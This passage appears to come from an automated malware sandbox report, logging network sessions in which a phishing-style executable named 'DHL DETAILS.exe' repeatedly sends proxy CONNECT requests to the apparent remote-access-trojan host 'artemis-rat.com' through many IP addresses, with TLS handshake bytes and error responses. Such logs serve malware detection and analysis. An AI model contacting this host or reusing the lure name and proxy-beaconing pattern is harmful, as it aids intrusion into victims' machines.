                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1633192.168.2.55509943.153.172.764436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.015029907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1634192.168.2.55494245.231.133.51806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.017211914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.703615904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.092276096 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:21.092957020 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ec 52 9b 06 0f ab 38 c3 73 8a 0b 61 4c 06 03 c0 a0 de f7 82 ef 4d c4 ad 1a 15 d5 4a c2 e6 2c 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: lheR8saLMJ,*,+0/$#('=<5/artemis-rat.com#U_EWT"e'2`.Ujwb>>Tk`[`1<I+^4
                                                                                    Mar 9, 2024 13:14:21.482938051 CET536INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ec 52 9d 0b 6c 7c 2f 31 f8 71 07 22 e1 9e b0 18 1c 7f d9 0a 70 16 0a 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                                                                    Data Ascii: C?eRl|/1q"pDOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                                                                    Mar 9, 2024 13:14:21.483041048 CET536INData Raw: c6 05 92 78 e0 4f 78 0a d2 60 c4 1d 4d 2f 50 10 83 ed 02 03 01 00 01 a3 82 02 75 30 82 02 71 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 05 a0 30 13 06 03 55 1d 25 04 0c 30 0a 06 08 2b 06 01 05 05 07 03 01 30 0c 06 03 55 1d 13 01 01 ff 04 02 30 00
                                                                                    Data Ascii: xOx`M/Pu0q0U0U%0+0U00U<IXM%A'CF20U#0n+_+0x+l0j05+0)http://ocsp.pki.goog/s/gts1p5/4mHaPTRzkCs01+0%http://pki.g
                                                                                    Mar 9, 2024 13:14:21.483078957 CET376INData Raw: 00 76 00 da b6 bf 6b 3f b5 b6 22 9f 9b c2 bb 5c 6b e8 70 91 71 6c bb 51 84 85 34 bd a4 3d 30 48 d7 fb ab 00 00 01 8d aa 09 6c 5a 00 00 04 03 00 47 30 45 02 20 14 4e 3d 50 55 e8 cc 24 1d 57 8b ac c0 53 a0 61 43 18 61 8b d3 67 2d ed cd aa b3 4e 5c
                                                                                    Data Ascii: vk?"\kpqlQ4=0HlZG0E N=PU$WSaCag-N\:b!ixanr9,1rtlY0*HR5zo_$F|QNc4+G@]LiY%}+]24'-6TsnqM}oVM)k+T/
                                                                                    Mar 9, 2024 13:14:21.487431049 CET536INData Raw: 7c f0 30 c1 81 dd bd 46 3c 84 41 91 c0 f9 72 70 be e9 27 7e 00 05 90 30 82 05 8c 30 82 03 74 a0 03 02 01 02 02 0d 02 03 bc 50 a3 27 53 f0 91 80 22 ed f1 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31
                                                                                    Data Ascii: |0F<Arp'~00tP'S"0*H0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R10200813000042Z270930000042Z0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P5
                                                                                    Mar 9, 2024 13:14:21.487473965 CET536INData Raw: 01 a3 82 01 76 30 82 01 72 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 01 86 30 1d 06 03 55 1d 25 04 16 30 14 06 08 2b 06 01 05 05 07 03 01 06 08 2b 06 01 05 05 07 03 02 30 12 06 03 55 1d 13 01 01 ff 04 08 30 06 01 01 ff 02 01 00 30 1d 06 03 55 1d
                                                                                    Data Ascii: v0r0U0U%0++0U00Un+_+0U#0+&q+H'/Rf,q>0h+\0Z0&+0http://ocsp.pki.goog/gtsr100+0$http://pki.goog/repo/certs/gtsr1.
                                                                                    Mar 9, 2024 13:14:21.487498999 CET536INData Raw: b8 47 b5 e9 96 b5 9f 07 cd a6 ab 3e 32 8a c0 86 83 c5 c1 41 c8 9f 2f 35 8e 0d c0 07 7a e1 ac c9 65 b5 cb 8a a7 dd 71 d8 61 65 39 84 ac 32 3e f7 7a 36 f1 56 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5
                                                                                    Data Ascii: G>2A/5zeqae92>z6VWAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[pe
                                                                                    Mar 9, 2024 13:14:21.487570047 CET536INData Raw: 32 38 30 30 30 30 34 32 5a 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 22 30 20 06 03 55 04 0a 13 19 47 6f 6f 67 6c 65 20 54 72 75 73 74 20 53 65 72 76 69 63 65 73 20 4c 4c 43 31 14 30 12 06 03 55 04 03 13 0b 47 54 53 20 52 6f 6f 74 20 52 31
                                                                                    Data Ascii: 28000042Z0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R10"0*H0w;>@<}2qj.K+^R#'c~^hZGM3NlKd)%#=.`
                                                                                    Mar 9, 2024 13:14:21.487590075 CET536INData Raw: 3a 66 ec 07 8a 26 df 13 d7 57 65 78 27 de 5e 49 14 00 a2 00 7f 9a a8 21 b6 a9 b1 95 b0 a5 b9 0d 16 11 da c7 6c 48 3c 40 e0 7e 0d 5a cd 56 3c d1 97 05 b9 cb 4b ed 39 4b 9c c4 3f d2 55 13 6e 24 b0 d6 71 fa f4 c1 ba cc ed 1b f5 fe 81 41 d8 00 98 3d
                                                                                    Data Ascii: :f&Wex'^I!lH<@~ZV<K9K?Un$qA=:z78040U0U00U+&q+H'/Rf,q>0U#0`{fEP/}4K0`+T0R0%+0http://ocsp.
                                                                                    Mar 9, 2024 13:14:21.487632990 CET466INData Raw: a1 e4 1a d6 fd 6f 83 81 6f ef 8c cf 97 af c0 85 2a f0 f5 4e 69 09 91 2d e1 68 b8 c1 2b 73 e9 d4 d9 fc 22 c0 37 1f 0b 66 1d 49 ed 02 55 8f 67 e1 32 d7 d3 26 bf 70 e3 3d f4 67 6d 3d 7c e5 34 88 e3 32 fa a7 6e 06 6a 6f bd 8b 91 ee 16 4b e8 3b a9 b3
                                                                                    Data Ascii: oo*Ni-h+s"7fIUg2&p=gm=|42njoK;7D~lF!fUl)f[wIH(3rS5b$9~*AR?,( MJJZ*R|AP \`8V~%N:)Dkt"Q9


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1635192.168.2.55510043.153.172.764436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.017338991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1636192.168.2.55329351.15.223.12163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.017416000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:23.130029917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:26.130058050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.146459103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1637192.168.2.555000172.67.182.90806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.070493937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.228606939 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1638192.168.2.554291209.222.97.30625436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.070825100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1639192.168.2.55431851.222.241.157440296352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.071132898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.723980904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.333414078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.536444902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.833250046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.098834038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.442758083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.146197081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1640192.168.2.554247103.162.141.154856352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.071191072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1641192.168.2.55510143.153.172.764436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.071722984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1642192.168.2.550463217.112.80.252806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.071919918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1643192.168.2.55418851.15.242.20288886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.071921110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:23.130080938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:26.130068064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.146482944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1644192.168.2.55387468.1.210.18941456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.091698885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1645192.168.2.55440091.92.155.20731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.092973948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.404526949 CET28INHTTP/1.1 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1646192.168.2.55502868.71.247.13041456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.111187935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1647192.168.2.55419941.223.234.116372596352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.115727901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1648192.168.2.55501338.54.6.3990806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.119039059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1649192.168.2.555036104.20.75.69806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.121287107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.275363922 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1650192.168.2.555044172.67.127.188806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.132102013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.286125898 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1651192.168.2.554234134.122.81.14180816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.140651941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1652192.168.2.554972159.223.71.71605126352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.140841007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.833260059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.833767891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:23.833204985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.739975929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.646334887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.646372080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1653192.168.2.55499294.130.94.45806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
